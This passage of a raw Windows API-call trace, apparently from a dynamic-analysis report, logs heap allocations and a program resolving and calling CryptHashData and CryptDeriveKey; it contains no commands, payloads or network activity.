[0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0245.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51178, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0245.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.743] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0245.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.744] CryptHashData (hHash=0xa87050, pbData=0x2e54d38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0245.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0245.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0245.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0245.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0245.744] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0245.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0245.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0245.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0245.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.782] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.782] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0245.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0245.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0245.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0245.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0245.783] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e512c8 [0245.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e512c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.786] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0245.787] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f50) returned 1 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0245.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0245.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0245.789] HeapFree (in: hHeap=0x970000, 